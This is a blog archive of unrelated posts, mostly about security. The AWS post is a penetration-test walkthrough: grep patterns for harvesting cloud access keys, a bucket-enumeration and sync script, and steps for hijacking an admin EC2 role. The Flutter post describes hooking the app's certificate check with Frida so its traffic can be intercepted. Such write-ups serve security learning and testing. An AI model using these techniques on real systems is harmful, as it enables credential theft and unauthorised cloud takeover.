
Red Team, Blue Team, and Purple Team: Understanding the Roles in Cybersecurity
, , –
Red, Blue, and Purple Teams are terms often used in the context of cybersecurity and information security to describe different roles and approaches in testing and improving the security of an organization’s systems and networks. Here’s an overview of each team and their respective roles:
- Red Team:
- Role: The Red Team represents the attackers or adversaries. Their primary role is to simulate cyberattacks on an organization’s systems, networks, and infrastructure to identify vulnerabilities and weaknesses.
- Activities:
- Conduct penetration testing to exploit vulnerabilities.
- Use hacking techniques to breach defenses.
- Mimic real-world attack scenarios.
- Test the organization’s incident response capabilities.
- Provide a comprehensive report on findings and recommendations for improvement.
- Goal: To identify weaknesses in the organization’s security posture, which can help the organization proactively improve its defenses and response capabilities.
- Benefits: Red Team exercises help organizations identify vulnerabilities and gaps in their security measures that may not be apparent through traditional security assessments.
- Blue Team:
- Role: The Blue Team represents the organization’s defenders. Their primary role is to protect the organization’s systems, networks, and data from cyber threats and to detect and respond to security incidents.
- Activities:
- Monitor and analyze network traffic and system logs.
- Implement and manage security controls and tools.
- Develop and maintain incident response procedures.
- Investigate and respond to security incidents.
- Continuously assess and improve security measures.
- Goal: To maintain a strong and resilient security posture, detect and respond to threats in real-time, and minimize the impact of security incidents.
- Benefits: Blue Team activities are crucial for day-to-day security operations, threat detection, and incident response, helping organizations defend against cyber threats.
- Purple Team:
- Role: The Purple Team is a collaborative effort that combines elements of both the Red Team and Blue Team. Its role is to improve communication and cooperation between these teams.
- Activities:
- Conduct controlled exercises with Red Team and Blue Team members working together.
- Share information about vulnerabilities, attack techniques, and defensive measures.
- Test and refine incident response procedures in real-time.
- Collaboratively assess and improve security controls.
- Goal: To enhance the overall security posture of the organization by fostering collaboration between offensive (Red) and defensive (Blue) teams.
- Benefits: Purple Team exercises promote a more holistic and coordinated approach to cybersecurity. They ensure that Red and Blue Teams work together to address vulnerabilities and threats effectively.
In summary, Red Teams simulate cyberattacks to uncover vulnerabilities, Blue Teams defend against threats and respond to incidents, and Purple Teams facilitate collaboration between the two to enhance an organization’s overall security posture. These teams play essential roles in proactive security testing, incident response, and continuous improvement in the ever-evolving field of cybersecurity.
#cybersecurity #redteam #redteaming #blueteam #purpleteam #InfoSec #cyberdefense

Leveraging AWS IAM Permissions for Complete Cloud Takeover: An Actual Case Study
Part 1 – AWS Security
Introduction: In this real-world case study, we delve into the enumeration and strategic utilization of AWS IAM permissions. It is strongly recommended that you familiarize yourself with my prior article explaining the intricacies of IAM permissions, despite its length, as it serves as a foundational prerequisite for comprehending the tactics employed here. Furthermore, to maintain focus on the more intricate aspects of our exploitation efforts, we will not delve extensively into the simpler vulnerabilities we encountered (some of which have been previously addressed in a separate writeup).
Throughout this study, we will explore the manual process of enumerating IAM policies and roles, as well as explore automated tools designed for this purpose, all while emphasizing the importance of not placing absolute trust in automation. Additionally, we will provide a brief tutorial on using “jq.”
Initiating Network Access: My initial point of entry into the network was discovered through a Nessus scan of a publicly accessible AWS endpoint. This scan revealed the presence of an exposed, unauthenticated ResourceManager service within a Hadoop instance. If you recall, this vulnerability was previously discussed in my writeup on Hadoop and MCollective exploitation, and it can be readily exploited using Metasploit to achieve Remote Code Execution (RCE).
Having successfully compromised this instance and swiftly establishing a couple of backdoors to ensure continued access, I commenced network scanning. Eventually, I identified a master Hadoop node with a service exposed on port 9298, accessible via an internal interface within the 172.16.0.0/16 subnet.
I confirmed that it hosted configuration files for Hadoop and proceeded to download all the files for analysis. In AWS environments, one of the most valuable discoveries you can make is AWS access keys and secret keys, which can be located using the regular expressions provided here: https://gist.github.com/hsuh/88360eeadb0e8f7136c37fd46a62ee10
AWS provides three methods for accessing resources:
- Through the web console
- Through the command line interface (CLI)
- Through APIs
To use the CLI, you require an access key, a secret key, and optionally a token. Access keys and secret keys can be identified using the following regular expressions:
grep -RP '(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])' *
grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' *
After obtaining all the necessary files, I conducted a search and located a match in a file called “core-site.xml.”
Next, I employed the tool “enumerate-iam.py” to perform a brute-force analysis of the permissions available to that account.
I observed that the account had the ability to list S3 buckets but did not appear to possess admin privileges. To conduct a quick privilege escalation check, I used RhinoSecurityLab’s “aws_escalate.py,” a tool I previously mentioned in my article on IAM permissions.
Unfortunately, it appeared that the account did not even have “GetUser” privileges. However, there were still other avenues to explore. Let’s return to the S3 route.
Pivoting for Access: We needed to configure a profile with the obtained credentials and initiate enumeration.
aws configure --profile test

aws --profile test s3 ls
There were approximately 180 buckets. We began reading them with:
aws --profile test s3 ls s3://backup-db-logs
This also presented a challenge as it turned out that the account had permissions to list the buckets but not to read them. To identify buckets that we could read, various tools were available, but we preferred to create our own scripts for better control over the process:
for i in "$@" ; do
if [[ $i == "--profile" ]] ; then
profile=$(echo "$@" | awk '{for(i=1;i<=NF;i++) if ($i=="--profile") print $(i+1)}')
AWS_ACCESS_KEY_ID=$(cat /root/.aws/credentials | grep -i "$profile" -A 2 | grep -i = | cut -d " " -f 3 | head -n 1)
AWS_SECRET_ACCESS_KEY=$(cat /root/.aws/credentials | grep -i "$profile" -A 2 | grep -i = | cut -d " " -f 3 | tail -n 1)
break
fi
done
echo "Enumerating the buckets..."
aws --profile "$profile" s3 ls | cut -d ' ' -f 3 > /tmp/buckets
echo "You can read the following buckets:"
>/tmp/readBuckets
for i in $(cat /tmp/buckets); do
result=$(aws --profile "$profile" s3 ls s3://"$i" 2>/dev/null | head -n 1)
if [ ! -z "$result" ]; then
echo "$i" | tee /tmp/readBuckets
unset result
fi
done
Invoke the script using:
bash enumerateReadBuckets.sh --profile test
We only had access to four buckets, which was a modest result. Let’s begin syncing all the information for local analysis.
for i in $(enumerateReadBuckets --profile test | tail -n +1); do aws s3 sync s3://"$i" .; done
However, our script did not return as expected. While we weren’t certain about the issue at that moment, this situation is not uncommon during penetration testing, so we proceeded with manual enumeration.
We started with our first bucket, which we’ll refer to as “bucket1.”
aws --profile test s3 ls s3://bucket1

aws --profile test s3 ls s3://bucket1/conf/

aws --profile test s3 cp s3://bucket1/conf/hadoop/core-site.xml .
Excellent! We found new credentials. Let’s create a new profile to use them.
aws configure --profile test2
Now, let’s perform a brute-force analysis of our permissions:
./aws_escalate.py --access-key-id AKID --secret-key SK
This new account appears to have significantly more permissions than our initial one. Let’s attempt to add a new user:
./aws_escalate.py --access-key-id AKID --secret-key SK --user-name USER
Unfortunately, we still did not obtain an admin account. However, we managed to escalate privileges manually. Let’s explore how.
Now, this is where our reasonably proficient knowledge of the AWS CLI becomes advantageous. The “aws_escalate” script relies on the “GetUser” operation to retrieve information about the current user. However, the “test2” account lacks the necessary “GetUser” permissions. Fortunately, there are alternative methods for obtaining information about the user you’re operating under. One such method involves using the Security Token Service API:
aws sts get-caller-identity
Now that we’ve identified the user, we can specify it manually:
./aws_escalate.py --access-key-id AKID --secret-key SK --user-name USER
The script might indicate that no methods are possible due to the user’s lack of permissions to execute the methods it uses. However, we were able to manually escalate privileges with this user. Let’s explore how.
Next, we need to find the ideal role to impersonate. If you recall the permissions associated with our “test2” user, many of them were related to EC2. Referring back to Rhino’s excellent blog post, we can see that method 3 actually involves using EC2:
Description: An attacker with the iam:PassRole
and ec2:RunInstances
permissions can create a new EC2 instance and assign an existing EC2 instance profile/service role to it. They can then log in to the instance and retrieve the associated AWS keys from the EC2 instance metadata, granting access to all the permissions associated with the assigned instance profile/service role.
Before we proceed, it’s essential to clarify that while a script is an efficient way to enumerate information, it usually cannot guarantee with 100% certainty whether privilege escalation is possible. This is because:
- Most privilege escalations depend on multiple factors, not all of which are straightforward to correlate.
- Amazon’s permissions are highly granular, meaning you might have permissions for certain actions (e.g., listing buckets) but not for others (e.g., reading the contents of those buckets).
Consider the method mentioned above. Having PassRole
and RunInstances
privileges alone isn’t sufficient. You also need to identify which role to impersonate and establish a connection with the instance, which might require pre-existing SSH keys or other methods. Additionally, it depends on the instance’s security group configurations. Enumerating security groups is essential to determine which one to assign to the instance or if you have privileges to create new ones.
However, granular permissions offer more opportunities than initially apparent, as we’ll explore further.
Now, the first step is to find a role suitable for hijacking. Let’s check if we can enumerate roles using:
aws --profile PROFILE iam list-roles | head -n 10
Great! We have list-roles
privileges. Now, there are two criteria we need for identifying a suitable role for hijacking:
- The role should have an Administrator policy or a similar highly privileged policy attached.
- The role’s trust policy should include Amazon’s EC2 service to allow instances to assume the role.
For the first criterion, we can list the associated managed policies with:
aws --profile PROFILE iam list-attached-role-policies --role-name ROLE
We can also list the inline policies with:
aws --profile PROFILE iam list-role-policies --role-name ROLE
Let’s attempt this with the “Administrators” role as an example:
aws --profile PROFILE iam list-attached-role-policies --role-name Administrators
Great! Now, let’s try to retrieve the trust relationship document (the assume role policy) to see which entities can assume this role. We can do this with:
aws --profile PROFILE iam get-role --role-name ROLE
This command should provide the output containing trust relationship information if your account has the necessary permissions. However, in the case of the “test2” account, this information isn’t accessible.

But remember what we discussed about granular permissions? There are often multiple ways to obtain the same information. In this case, the user didn’t have permissions to use get-role
, but it did have permissions to use list-roles
. Amazon’s documentation states that this call is used to list roles with a specified path prefix, and if none are found, it returns an empty list. However, this definition can be misleading. With this call, you can specify the --path-prefix
to search for roles with a specific prefix. If you omit it, it defaults to a slash (“/”), effectively obtaining a list of all roles—replacing the need for get-role
for our specific use case. Anyways, let’s give it a try:
aws --profile PROFILE iam list-roles
Great! Now, we need a way to list the roles that have an assume role policy with AWS EC2 as a trustee. To filter these roles, we’ll use jq
, a tool for parsing JSON output. To explain how to use it, let’s break it down step by step. First, let’s examine the structure we need to parse. Let’s consider one role from the output:
The information we need is listed under “Principal,” and it should look something like:
"Principal": {
"Service": "ec2.amazonaws.com"
}
Let’s select only the fields we’re interested in with:
aws --profile test2 iam list-roles | jq -r '.Roles[] | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service'
This command will filter for the RoleName and the Principal Service.
However, the output may not match the example we provided earlier because not all results will look exactly the same. Some might involve a different Principal, such as a Federated Principal:
This complexity makes parsing the output a bit harder, but not impossible. Let’s filter only the elements where “Principal.Service” is not null:
aws --profile test2 iam list-roles | jq -r '.Roles[] | select(.AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service'
We’re getting closer. Now, let’s refine the results:
aws --profile test2 iam list-roles | jq -r '.Roles[] | select(.AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service' | grep -B 1 "ec2.amazonaws.com" | grep -v "ec2.amazonaws.com" | sort -u | uniq
This command will retrieve all the results where “Principal.Service” is present, along with the Role Name. It will then remove the unnecessary “ec2.amazonaws.com” entries and sort and remove duplicates.
Now, we have identified potential candidates for instance role hijacking. The next step is to get the associated policies for each candidate using list-attached-role-policies
and list-role-policies
, as mentioned earlier. After a few minutes, we find a role with an Administrator policy attached. For the sake of illustration, let’s call it “danger-role.” It’s quite evocative and reminds me of “danger-zone,” which I appreciate as an Archer fan.

Bypassing Root CA Checks in Android Apps Built with Flutter
Android App Security:
In this post, I will explore the topic of bypassing Root Certificate Authority (CA) checks in Android applications developed using the Flutter framework. Although it is important to note that bypassing these security measures is generally not recommended, I aim to provide insights into the technical aspects for educational purposes only.
Understanding Root CA Checks:
Root CA checks are a fundamental security measure in Android applications that validate the authenticity and integrity of SSL/TLS connections. These checks ensure that the server’s certificate is issued by a trusted CA and has not been tampered with. Bypassing these checks allows one to perform Man-in-the-Middle attacks, such as using BurpSuite.
Limitations in Flutter:
Flutter, as a cross-platform framework, leverages platform-specific APIs for networking operations. However, as of the latest update, Flutter does not provide direct access to low-level networking APIs, making it difficult to bypass Root CA checks solely within the Flutter framework.
Recently, I delved into Android applications developed using the Flutter framework, which was a new territory for me. While engaging in a discussion unrelated to app testing, I stumbled upon an app to analyze. Excited about the opportunity, I launched the app on my mobile device, connected it to a testing WiFi network and fired up burpsuite, and soon encountered a familiar challenge faced by app testers.
Wonderful! They’re doing something right by preventing Burps root CA from being used and I could probably bypass this with Frida. I pulled the .apk apart and found…
After a bit of reading about the Flutter Engine it seems the majority of the work is performed by “libflutter.so”. This was made more apparent after starting “frida-trace” and setting up intercept scripts for all the usual SSL methods that you’d need to bypass, although they libraries were loaded I didn’t see a single call to any of the methods and the SSL connection still failed to start.
So I dug further, after some further research I found out that Flutter bundles the BoringSSL libraries into “libflutter.so” and performs its own verification steps rather than trust the OS’s systems. It also forces the use of a known set of Root certificates which goes someway to explain why I couldn’t MITM the connection.
In summary, Flutter integrates BoringSSL into “libflutter.so” and implements its own SSL verification steps, bypassing the OS’s SSL mechanisms. The enforced use of trusted Root certificates and the challenge of analyzing the stripped library make it essential to monitor logcat output for insights into the SSL connection process. These findings are valuable for security assessments and custom SSL handling in Flutter-based Android apps.
Breaking out Ghidra and loading the shared object wasn’t much better as the library had been stripped of symbols, making it tough to find the verification functions. I fired up the app again and watched the output of logcat to see if it gave me any clues:
See the line containing “handshake.cc”? After some trawling through strings and references in Ghidra I found some methods that contained it:
The 0x160 seems to correspond to the line number in the source that generate the error, I grabbed the BoringSSL code and started looking for x509 verification functions. One cropped up in “ssl_x509.cc”:
Searching Ghidra for this file name showed up the full path string as expected, tracing cross-references to that string dumped me in the middle of a call to “FUN_00316500” above with a line number value that roughly matched the source file. Bingo!
To get this check to pass all I’d have to do would be:
-
-
- Calculate the actual address of the function in the phones memory
- Build a Frida Interceptor script to trap it
- Alter the return value to “true”
-
Calculating the offset of the function could be done by finding the Virtual address of a function we know the name of, working out the target functions offset from it and then adding that to the the actual address of the first function.
The Flutter shared object exports one function, “JNI_OnLoad” which is called by the Android runtime during startup, Frida could find the address of this easily so that made for a good base-function to start with. The offset of the X509 function from this could be calculated and added to the base address easily, setting up an interception for this showed repeated calls to the method whenever I forced the app to make a request:
See how the “ret” value is “0x0”? Lets patch that out:
Problem solved!
This was definitely a much harder one to crack than most apps, I’m expecting people will hide behind that as a form of “security” and forget to secure the API’s the app interfaces with 🙂
I grabbed a few more Flutter apps and check the MD5 hashes of their “libflutter.so” files, it appears they differ in most cases which means that each app will need the offset of “ssl_crypto_x509_session_verify_cert_chain” calculating, I’m not sure if this can be automated or not given the lack of debug symbols but honestly its not that much of a problem for testing only a single app.
#FlutterApp #Androidsecurity #Applicationsecurity #infosec

Application of AI, Machine Learning and Data Analytics in Healthcare.
Application of AI, Machine Learning and Data Analytics in Healthcare.
The combination of AI, machine learning, and data analytics provides researchers and scientists with powerful tools to process and interpret large volumes of complex healthcare data. Here’s how these technologies work together:
- Data Processing and Integration: AI, machine learning, and data analytics techniques can handle large volumes of healthcare data, including patient records, genetic information, medical images, and research articles. These technologies can process and integrate diverse data sources, ensuring that relevant information is captured and organized for analysis.
- Pattern Recognition and Data Mining: Machine learning algorithms can identify patterns, trends, and correlations within the data. By training the algorithms on a vast amount of healthcare data, they learn to recognize complex relationships and indicators that may be difficult for humans to detect. This enables researchers to uncover valuable insights and potential associations between variables.
- Feature Extraction and Selection: Machine learning algorithms can automatically extract relevant features from healthcare data. For example, in genetic data, algorithms can identify specific gene variants or mutations that may be associated with rare diseases. Feature selection techniques help researchers identify the most informative and predictive features for accurate diagnostics or research purposes.
- Predictive Modeling and Decision Support: Machine learning models can be developed to predict outcomes, such as disease diagnoses or treatment responses, based on the available data. These models can assist researchers and clinicians in making informed decisions by providing evidence-based recommendations or predictions. This decision support can aid in early diagnosis, personalized treatment planning, and improving patient outcomes.
- Data Visualization and Interpretation: AI and data analytics tools offer visualization techniques that facilitate the interpretation of complex healthcare data. Graphs, charts, and interactive dashboards can present the data in a visually meaningful way, enabling researchers to understand trends, relationships, and anomalies more easily. Visual representations can help communicate findings and support data-driven decision-making.
- Continuous Learning and Improvement: AI and machine learning algorithms have the ability to continuously learn and adapt. As researchers incorporate new data and insights, the algorithms can update their models and refine their predictions. This iterative learning process improves the accuracy and effectiveness of the analyses over time, enabling researchers to uncover new knowledge and refine their understanding of rare diseases.
By leveraging AI, machine learning, and data analytics, researchers and scientists can effectively process, integrate, and interpret large volumes of complex healthcare data. These technologies enable them to discover meaningful patterns, make predictions, gain valuable insights, and support evidence-based decision-making in the field of rare disease diagnosis and research.

Talking about Information Security Awareness
Information Security Awareness
In the current society, with the rapid development of new-generation information technologies such as artificial intelligence and big data, people’s lives have become more and more convenient and fast. However, when we enjoy technological life, we don’t realize that we have been exposed to dangers such as information fraud, information capture and information harassment. Compared with the traditional means of fraud in the past, today’s criminals take advantage of the efficiency of technology to take advantage of network security loopholes to carry out fraud, making people even more difficult to guard against. Perhaps it is some small negligence in life that may cause personal information leakage and cause information security risks.
The information security has changed people’s work, study and living habits, making people more dependent on computer networks. While enjoying the various conveniences brought by the information security, people often lack information security awareness and ignore information security guarantees. People’s information security awareness is gradually established through the awareness and understanding of information security. This post analyzes and discusses the connotation of information security awareness and the current situation of information security development, and puts forward effective measures to strengthen information security awareness.
The importance of information security
Information security is the cornerstone of informatization construction and the guarantee for the normal operation and effectiveness of information networks. Information security has become an overall problem affecting national security, social stability and economic development. A country’s ability to obtain information and ensure information security is a symbol of comprehensive national strength, economic competitiveness and viability in the 21st century, and a “killer copper” for future international competition. The development of society and the arrival of the digital network era have changed many aspects of people’s lives. The universal deposit and withdrawal of bank deposits, deposits and withdrawals in different places, surfing the Internet, online shopping and online transactions all bring convenience to people’s lives. But while computers and networks bring convenience and speed, it also imposes some conditions. Nowadays, people have less cash in their pockets and more various cards, such as bank credit cards, medical and social security cards, salary cards and so on. These cards really make people convenient, but just because these cards are so convenient that when people use them, the computer system only recognizes the cardholder and does not identify the real owner of the card, so people have to for the safety of the information on the card Set passwords and more for various cards. This is an information security issue. People set various passwords for the security of their information.
With the development and popularization of the Internet, network viruses, network attacks, and network crimes have rapidly reached an unprecedented rampant level. Today’s viruses can spread rapidly across the world within ten minutes, disrupting the global economy in an instant. Network security has become the focus of global attention, and hackers and computer viruses are threatening the normal operation of various departments. When people increasingly rely on computer networks, they find that the network is so fragile. Therefore, information security has been paid more and more attention all over the world, and information security has become an important symbol to measure whether an information system is perfect.
The International Organization for Standardization (ISO) defines information security as “technically and managerially established security protection for data processing systems to protect computer hardware, software and data from damage, change and disclosure due to accidental and malicious reasons”.
Main content of information security
The main contents of information security include: confidentiality, integrity, availability, authenticity and validity.
Information security mainly refers to the maintenance of confidentiality, integrity and availability of information, that is, the use of computer software and hardware technology, network technology, key technology and other security technologies and various organizational management measures to protect information during its life cycle. In all links of generation, transmission, exchange, processing and storage, its confidentiality, integrity and availability will not be destroyed.
Confidentiality means: Ensuring that only those who have been granted specific permissions have access to information. The confidentiality of information varies according to the number of objects that are allowed to access the information. The information that everyone can access is public information, and the information that needs to be restricted from access is sensitive information or secret information. According to the importance of the information and confidentiality requirements, the information is divided into Different levels of confidentiality, such as internal military documents are generally divided into three levels: secret, confidential and top secret. Authorized users can operate confidential information according to the authorized operation rights. Some users can only read information, and some users can both read and write.
Integrity of information means: to ensure the correctness and completeness of information and processing methods. On the one hand, information integrity refers to the fact that no tampering, loss of information, or wrong information occurs in the process of using, transmitting, and storing information; on the other hand, it refers to the correctness of information processing methods, improper operations, and It may cause loss of important files, or even paralysis of the entire system.
Availability of information refers to ensuring that authorized users can indeed access the information they need when they need it. That is, information and related information assets can be obtained immediately when the authorized person needs them. For example, interruption of communication lines and network congestion will cause information to be unavailable for a period of time and affect normal business operations. This is the destruction of information availability. Systems that provide information must be able to withstand attacks appropriately and recover from failure. In addition, the authenticity and validity of information must be guaranteed, that is, business transactions and information exchanges between organizations or between organizations and partners are trustworthy.
Information Security Development Status
Information security can be regarded as an emerging industry in the process of my country’s informatization construction. In general, the development trajectory of information security includes the following three stages:
⑴The budding stage
Before 2005, various industries and departments in China began to develop awareness of information security: from the initial “emphasis on information construction” but “ignoring the construction of security systems” to “awareness of the importance of security” and “hope to realize information security” Security”, but think that information security is very mysterious, and do not know where to start. At this stage, customers in various industries are consciously learning and accumulating information security knowledge, and conducting extensive exchanges with authorities in this field to understand their technologies, concepts, products, and services. At the same time, some small-scale and sporadic information security constructions have also appeared in some enterprises and departments, but they have not achieved scale and systematization; moreover, for information security in this period, the government’s macro-policy is more appealing. There are many, but there are relatively few specific affairs to be promoted. Although it seems very lively, there are very few actual information security constructions.
⑵ outbreak stage
After 2005, the needs of various domestic industries and departments for information security construction have changed from “spontaneous” to “conscious”. The customer has basically understood the construction content and significance of information security. Many industry departments have begun to plan and deploy internal information security construction. Leaders of various industries attach great importance to it and continue to increase investment. Therefore, information security has become the top priority of this phase of construction. In a sense, the explosion of demand in the information security market can be said to be caused by the “debts” of various industries in information security over the years.
⑶ popularization stage
When information security construction is integrated with the overall information construction of various industries, information security is one of the key links in IT construction. It is as important and ubiquitous as air, but it is not easy to be noticed.
In 3 to 5 years from now, the information security market will maintain a high-speed and super-scale development momentum, and telecommunications, government, and finance will be the industries with the greatest demand for information security. Because the telecommunications industry and the financial industry are industries with large investment, fast development, high degree of informatization, complex needs, and relatively severe security situation, while government departments play a role model to the outside world due to their high position and urgent security needs, so There will also be increased investment in information security.
The biggest security issue in the 21st century is information security, as well as economic security, political security, military security, social security, technological security, and cultural security based on information security. The weakest link in information security is likely to be careless people, not software bugs. Hackers have captured many extremely complex networks, not only relying on superb technology, but also exploiting human weaknesses. Only by raising people’s security awareness to a very high level can we fundamentally reduce the risk of information security.
Effective Measures to Improve Information Security Awareness
A good information security environment is the need to further deepen reform and opening up and promote my country’s socialist modernization, and it is also the foundation of national security. The premise of a good information security environment is that all citizens must have a strong awareness of information security and a high degree of vigilance in protecting sensitive national information.
1. Improve the information security awareness of leading cadres
Leading cadres at all levels are not only the main body of generating, transmitting, utilizing and storing sensitive information, but also the main target of stealing sensitive information. Therefore, to improve the awareness of information security, the quality of information security of leading cadres at all levels is particularly important. Because only when leaders raise their awareness of information security can they seriously grasp information security work, strictly implement various laws and regulations, and strictly organize and implement information security inspections, can information security work be effective and well done.
2. Improve the information security awareness of confidential personnel
Secret-related personnel are important managers of secret information security, and are responsible for sending, receiving and keeping confidential secret information. Doing a good job in the team building of secret-related personnel and improving their quality is the key to doing a good job in information security. To improve the quality of secret-related personnel, in addition to improving ideological understanding, cultivating a scientific and rigorous style of work, and strictly abiding by laws and regulations and various rules and regulations, professional training on information security and confidentiality under high-tech conditions is required to enable them to master the use of modern technical tools to manage documents. Knowledge of archives, familiarity with their own business, high judgment and insight into phenomena that may cause leakage of secrets, and mastering a certain level of anti-theft technology. 3. Improve the information security awareness of professional and technical personnel
Professional and technical personnel are the new force of information security management in our country and the operators and maintainers of information security. Professional and technical personnel must have sufficient information security knowledge, fully understand the security performance of relevant security technologies, operating systems, and application software, keep track of security news and security technology developments, and develop good information security habits. The government should actively promote exchanges between my country’s information technology professionals and foreign countries in the cultivation of information security awareness. Learning from foreign successful experience, using foreign research results, drawing on foreign educational strength, and introducing foreign excellent teaching materials and related theories is a shortcut to rapidly improve the training level of information security awareness of professional and technical personnel in our country.
3. Raise the awareness of information security of the whole people
In order to enhance the citizens’ awareness of information security and improve the awareness of national information security, it is necessary to carry out information security education for the whole people. In order to ensure the security of the party and the state’s secrets under any circumstances, the most fundamental thing is to do a good job in ideological education and improve the information security awareness of the whole people. All industries and government information management departments at all levels should use public opinion and media to publicize the importance of information security; compile information security knowledge manuals to strengthen self-protection capabilities in information security; establish a set of security training systems for users of different levels. Gradually improve the technical level of computer users through hierarchical training; organize the study of laws and regulations on information security work, popularize common sense of information security, and introduce information security technologies. Only when the information security awareness of the whole people is enhanced, information security will be fully guaranteed.

What is Web3
What is Web3
First, lets see the previous generations:
Web1.0(1980-2000)
The first wave of the Internet began in the 1980s, and the iconic event was that two computers “communicated” through the customs clearance protocol. This protocol is the TCP/IP protocol created in 1983.
The network (World Wide Web) in this period can’t do too much “interconnection”, and more information is read-only.
Netscape (Netscape) is typical of this period, publishing information on the Internet.
- High barriers to access technology
- Index function without information
Web2.0 (2001-present)

Web 3.0 (concept was born in 2014)


- Content is censored and deleted
- Malicious comments
- The content is randomly quoted or plagiarized
- The economic interests of creators are determined by the platform
Medium (Web2 product)
Mirror (Web3 product)
Summary
By comparing the two products, Medium and Mirror, we can see that blockchain distributed storage provides a commercially feasible solution for information transparency and non-tampering from the technical level.

Application of Blockchain Technology in Education and Other Sectors
Blockchain technology is regarded as another disruptive technology after cloud computing, Internet of things and big data, which has received high concern by the governments, financial institutions and the enterprises. Essentially, blockchain technology is a kind of technical scheme to maintain a reliable database by means of decentralization and high trust. Its core technologies include distributed accounting technology, asymmetric encryption algorithm and intelligent contract. Furthermore, it has the distinguished characteristics such as decentralization, consensus mechanism, traceability and high trust. Nowadays, as the underlying technology of bitcoin, #blockchaintechnology is not only applied in the field of finance, but also has great potential in education.
What’s more, blockchain technology is expected to play an important role in the construction of internet +education ecology to promote the reform of education system. According to the experience and enlightenment from the application of blockchain in the financial field, the blockchain in education is mainly embodied in six areas of application: establishing individual knowledge on big data, creating intelligent education platform, developing degree certificate system, constructing new ecology of open education resources, achieving “self-organization” operation of networking in learning communities and developing the decentralization of education system.
As seen:
- In the financial field, global banking giants have formed the R3 Alliance, including more than 40 large international financial institutions such as HSBC, UBS, and Bank of America, to jointly develop blockchain technology. Nasdaq in the United States took the lead in launching Linq, a securities trading platform based on blockchain technology, which became an important milestone in the trend of decentralization in the financial securities market. Clearly, it is necessary to pay close attention to the impact of blockchain and other technologies on the financial sector.
- In the field of technology, IBM and The Linux Foundation have established a dedicated blockchain open source project Hyperledger Fabric, which has entered the substantive development stage. The company will provide Watson API on the Watson IoT platform to help enterprise customers and developers develop and test IoT applications based on cloud computing, in order to realize the use of blockchain to lead the autonomy of the Internet of Things.
- In the field of energy, foreign companies have launched energy blockchain projects, such as: Germany’s Siemens and New York’s new ventures have cooperated to apply blockchain technology to the microgrid power trading market; American energy company LO3 Energy and Bitcoin development company Consensus System Cooperated to build TranActiveGrid, an interactive grid platform based on blockchain system, for a small number of residents in the Gowanus and Park Slope neighborhoods of Brooklyn, New York.
- In the field of food, a research report from the University of Saad in the United Kingdom pointed out that if the blockchain technology is applied to the food supply chain, by making the data of food transparent, it may reduce the phenomenon of food waste, thereby solving the problem of food waste. In addition, Walmart is also trying to use blockchain technology to record the source of food, trying to let consumers have more food information, so as to improve some of the current chaos in the food industry.
- In the medical field, Philips Medical and Tierion have cooperated to allow Philips Medical to use blockchain technology to complete the authentication of medical records and the privacy protection of patients. Blockchain technology helps to solve the large-scale data quality problems that the medical industry is currently suffering from, and provides the medical industry with a unique source of authentic data, so that the system will no longer suffer from human errors or manual data reconciliation, thereby solving the problem of medical data trust.
Enlightenment on the application of blockchain in the field of education
The application of blockchain technology is bringing disruptive changes to the financial sector and creating new business opportunities. By studying the application mode of blockchain technology in the financial field, it is found that its value to the innovation and development of the financial field is mainly reflected in: eliminating intermediate trading platforms, reducing transaction costs; realizing real-time transaction settlement, improving transaction efficiency and asset utilization; distribution The transaction data is stored in a format, which cannot be tampered with and has high security; the automatic operation of the transaction process is realized based on the #smartcontract. The application scenarios and models of blockchain technology in the financial field provide the following enlightenment for its application in the education field:
(1) Strengthen the protection of intellectual property rights and build an educational trust system. The traceability of digital currency can reduce the bank’s expenditure on compliance verification and auditing such as anti-money laundering and anti-fraud, and effectively control the occurrence of illegal activities such as tax evasion and money laundering. In the field of education, the traceability of blockchain technology can be used to realize the copyright protection of educational assets and intellectual achievements, and solve the problem of intellectual property disputes from the source. In addition, digital currency storage on the blockchain has high security and reliability. In the field of education, important information such as student grades, personal files, and academic certificates can be stored on the blockchain to prevent information from being lost or maliciously tampered with. , build a safe, credible, and non-tamperable student credit system, and help solve the current problems of lack of student credit and global academic fraud.
(2) Optimize the educational business process to achieve efficient and low-cost educational resource transactions. In terms of cross-border payment, the blockchain uses the characteristics of decentralization to abandon the role of intermediary banks and realize point-to-point fast and low-cost cross-border payments. In terms of educational resource sharing, the use of distributed ledger technology to realize the direct connection between users and resources can simplify the operation process and improve the efficiency of resource sharing, so as to promote the open sharing of educational resources and solve the problem of resource islands. In terms of educational resource transactions, the use of decentralized features eliminates transaction intermediary platforms and realizes point-to-point connections between consumers and resources, thereby reducing expenses, simplifying operating procedures, and creating an efficient and low-cost educational resource transaction platform.
(3) Use the characteristics of decentralization to build a decentralized education system. Blockchain technology is applied to supply chain financial business. By eliminating intermediate transaction agencies and reducing human intervention, costs and operational risks are reduced. Wave has reached a cooperation agreement with Barclays Bank to put the letter of credit, bill of landing number and documents of the international trade process on the public chain, and conduct authentication and non-tamperable verification through the public chain, establishing completely transparent “rules of the game” to achieve verification Decentralization of rules. In the field of education, blockchain can be used to develop a decentralized education system, breaking the monopoly of traditional education services by schools or government agencies, so that any institution with educational qualifications can provide educational services and issue valid academic certificates. The effective integration of formal education and non-formal education promotes the reform of the education system for all people to participate in.
(4) Distributed storage and recording of credible learning data to achieve efficient connection between schools and enterprises. Blockchain technology makes the securities trading market more open, transparent, green, fair and efficient, turning the traditional model that was highly dependent on intermediaries into a decentralized flat network transaction model, and realizing distributed storage and recording of data. In the field of education, students’ personal information, academic performance, growth records and other content can be stored in a similar way, distributed in the education system, and can be shared with other schools or recruiting units on the basis of ensuring the authenticity and security of the information. Data content, as an important basis for student job interviews. Use distributed ledger technology to show employers their academic achievements and professional skills, build a bridge for communication between students and enterprises, and establish a new model of school-enterprise cooperation, so as to achieve efficient connection between students and employers.
